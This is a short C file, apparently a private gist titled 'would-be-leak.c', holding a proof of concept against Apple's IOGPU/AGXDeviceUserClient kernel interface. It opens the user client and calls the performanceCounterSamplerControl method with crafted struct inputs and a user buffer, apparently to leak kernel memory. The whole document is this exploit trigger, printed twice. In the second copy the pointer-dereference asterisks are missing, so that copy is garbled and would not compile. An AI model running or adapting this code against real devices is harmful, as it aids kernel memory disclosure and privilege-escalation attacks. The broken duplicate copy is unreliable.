jsherman212/would-be-leak.c Secret

## would-be-leak.c
static io_connect_t AGXDeviceUserClient(void){
    kern_return_t kret = KERN_SUCCESS;
    io_connect_t AGXDeviceUserClient = IO_OBJECT_NULL;
    const char *name = "IOGPU";

    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
            IOServiceMatching(name));

    if(!service){
        printf("%s: IOServiceGetMatchingService returned NULL\n", __func__);
        return IO_OBJECT_NULL;
    }

    /* AGXDeviceUserClient */
    int type = 1;
    kret = IOServiceOpen(service, mach_task_self(), type, &AGXDeviceUserClient);

    if(kret){
        printf("%s: IOServiceOpen returned %s\n", __func__, mach_error_string(kret));
        return IO_OBJECT_NULL;
    }

    return AGXDeviceUserClient;
}

void poc(void){
    uint32_t method_off = 0x1d;

    kern_return_t kret = KERN_SUCCESS;
    io_connect_t conn = AGXDeviceUserClient();

    uint8_t struct_input[0x20] = {0};

    *(uint32_t *)struct_input = 0;
    *(uint32_t *)(struct_input + 4) = 1;
    *(uint64_t *)(struct_input + 8) = 0xffffffff;

    uint8_t struct_output[0x20] = {0};
    size_t struct_output_sz = sizeof(struct_output);

    kret = IOConnectCallStructMethod(conn, method_off + 5, struct_input, sizeof(struct_input),
            struct_output, &struct_output_sz);

    if(kret){
        printf("first performanceCounterSamplerControl failed: %s\n", mach_error_string(kret));
        return;
    }

    memset(struct_input, 0, sizeof(struct_input));
    memset(struct_output, 0, sizeof(struct_output));

    struct_output_sz = sizeof(struct_output);

    uint64_t buflen = 0xc000;
    uint64_t addr = 0;
    kret = vm_allocate(mach_task_self(), &addr, buflen, 1);

    if(kret){
        printf("vm_allocate failed: %s\n", mach_error_string(kret));
        return;
    }

    uint32_t cmd = 12;

    *(uint32_t *)struct_input = cmd;
    *(uint32_t *)(struct_input + 4) = buflen;
    *(uint64_t *)(struct_input + 8) = addr;

    kret = IOConnectCallStructMethod(conn, method_off + 5, struct_input,
            sizeof(struct_input), struct_output, &struct_output_sz);
}
	static io_connect_t AGXDeviceUserClient(void){
	kern_return_t kret = KERN_SUCCESS;
	io_connect_t AGXDeviceUserClient = IO_OBJECT_NULL;
	const char *name = "IOGPU";

	io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
	IOServiceMatching(name));

	if(!service){
	printf("%s: IOServiceGetMatchingService returned NULL\n", __func__);
	return IO_OBJECT_NULL;
	}

	/* AGXDeviceUserClient */
	int type = 1;
	kret = IOServiceOpen(service, mach_task_self(), type, &AGXDeviceUserClient);

	if(kret){
	printf("%s: IOServiceOpen returned %s\n", __func__, mach_error_string(kret));
	return IO_OBJECT_NULL;
	}

	return AGXDeviceUserClient;
	}

	void poc(void){
	uint32_t method_off = 0x1d;

	kern_return_t kret = KERN_SUCCESS;
	io_connect_t conn = AGXDeviceUserClient();

	uint8_t struct_input[0x20] = {0};

	(uint32_t )struct_input = 0;
	(uint32_t )(struct_input + 4) = 1;
	(uint64_t )(struct_input + 8) = 0xffffffff;

	uint8_t struct_output[0x20] = {0};
	size_t struct_output_sz = sizeof(struct_output);

	kret = IOConnectCallStructMethod(conn, method_off + 5, struct_input, sizeof(struct_input),
	struct_output, &struct_output_sz);

	if(kret){
	printf("first performanceCounterSamplerControl failed: %s\n", mach_error_string(kret));
	return;
	}

	memset(struct_input, 0, sizeof(struct_input));
	memset(struct_output, 0, sizeof(struct_output));

	struct_output_sz = sizeof(struct_output);

	uint64_t buflen = 0xc000;
	uint64_t addr = 0;
	kret = vm_allocate(mach_task_self(), &addr, buflen, 1);

	if(kret){
	printf("vm_allocate failed: %s\n", mach_error_string(kret));
	return;
	}

	uint32_t cmd = 12;

	(uint32_t )struct_input = cmd;
	(uint32_t )(struct_input + 4) = buflen;
	(uint64_t )(struct_input + 8) = addr;

	kret = IOConnectCallStructMethod(conn, method_off + 5, struct_input,
	sizeof(struct_input), struct_output, &struct_output_sz);
	}